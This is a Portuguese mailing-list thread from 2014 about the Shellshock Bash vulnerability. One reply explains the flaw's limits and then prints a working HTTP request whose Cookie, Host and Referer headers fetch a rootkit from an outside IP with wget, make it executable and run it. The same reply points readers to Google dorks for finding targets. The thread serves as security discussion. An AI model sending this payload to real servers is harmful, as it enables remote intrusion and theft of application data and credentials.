shell-script-pt
[Top][All Lists]
Advanced

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [shell-script] Falha no Bash, "pior que o heartbleed"


From: Ernander (Nander)
Subject: Re: [shell-script] Falha no Bash, "pior que o heartbleed"
Date: Thu, 25 Sep 2014 15:04:57 -0300

Bom Não costumo me meter nesses Assuntos, mesmo pq sou analista de Segurança de uma Determinada ferramenta e eu Sou o Primeiro a METER O PAU qdo "SOLTAM UMA VULNERABILIDADE".

Concordo com o MrBits, Essa Vulnerabilidade te afeta? Se Sim COrrija-a das melhor Forma possível, se não KEEP CALM and Drink a BEER!

Att





Em 25 de setembro de 2014 14:56, MrBiTs address@hidden [shell-script] <address@hidden> escreveu:
 

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

On 09/25/2014 02:40 PM, Gilberto Nunes address@hidden [shell-script] wrote:
>
>
> Como que eu posso me aproveitar dessa falha?? Por exemplo o codigo abaixo não deveria deixar eu dar um touch onde não deveria?
>
> env x='() { :;};' bash -c 'touch /var/run/i'
>
> Eu não sei, mas testei isso num Ubuntu 12.02 LTS sem atualizar nada e não conseguir dar o touch. Não sou especialista nisso e
> gostaria de entender...

A "falha" de per si não tem absolutamente nenhum tipo de poder de escalar privilégios, já que entre outras coisas o bash roda na
instância do usuário e não como root. Para isso você precisaria ter um serviço que usasse bash como suporte para execução de
tarefas, como por exemplo um sistema web mal escrito que tivesse um index.cgi e que te permitiria fazer algo assim:

GET / HTTP/1.0
User-Agent: Thanks-Rob
Cookie:() { :; }; wget -O /tmp/besh http://162.253.66.76/nginx; chmod 777 /tmp/besh; /tmp/besh;
Host:() { :; }; wget -O /tmp/besh http://162.253.66.76/nginx; chmod 777 /tmp/besh; /tmp/besh;
Referer:() { :; }; wget -O /tmp/besh http://162.253.66.76/nginx; chmod 777 /tmp/besh; /tmp/besh;
Accept: */*

Nesse caso, você conseguiria baixar esse nginx que, na verdade, é um rootkit que te abriria uma porta para o servidor. Uma vez lá
dentro, imaginando que você caisse no document root de uma aplicação web que tivesse lá o seu config.sh e nesse config.sh você
tivesse endereço do banco, usuário e senha, no mínimo você teria acesso aos dados da aplicação, seus usuários, eventuais
informações sensíveis. Se o sysadmin for burro, ele colocou o usuário do banco como root com uma senha que é a mesma do root do
servidor, e aí você pode ter acesso a informações mais legais.

Divirta-se :) Google dorks são seus amigos.

- --
echo
920680245503158263821824753325972325831728150312428342077412537729420364909318736253880971145983128276953696631956862757408858710644955909208239222408534030331747172248238293509539472164571738870818862971439246497991147436431430964603600458631758354381402352368220521740203494788796697543569807851284795072334480481413675418412856581412376640379241258356436205061541557366641602992820546646995466P
| dc

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/

iQEcBAEBCAAGBQJUJFdjAAoJEG7IGPwrPKWrLwoH/1DBv/yGUuIgLDpFxVvBlOoC
MCu5Iy/v9AJFNW4t6Oc4zLoClMvhy2Z5NOGRBeCefYM6OlBdd1csc0O7A3XEsFx0
xv40ajEvwW6Ln0BD/bDHrdYGF6L6kTfu5zDwxUomAilYkoyESLsB2uLWgVeomJ8i
YCsYMdUs5b7s59OwN93el22616yqpFLP4QmUYedZpJCJEZgVroIyWD8yo4BLZkEH
QOzPXp2R8IZH2izPu4n4RqRf2nywC4qz2LgUVsZMC5OHSl+nD3hF6wBfSYx3xQcc
u81sReXFkXjOX+TDAknxcvqTbv9DyxT6Ykp2w8m17x2I7gUULcejnvvuGl3WQhk=
=OOWL
-----END PGP SIGNATURE-----



reply via email to

[Prev in Thread] Current Thread [Next in Thread]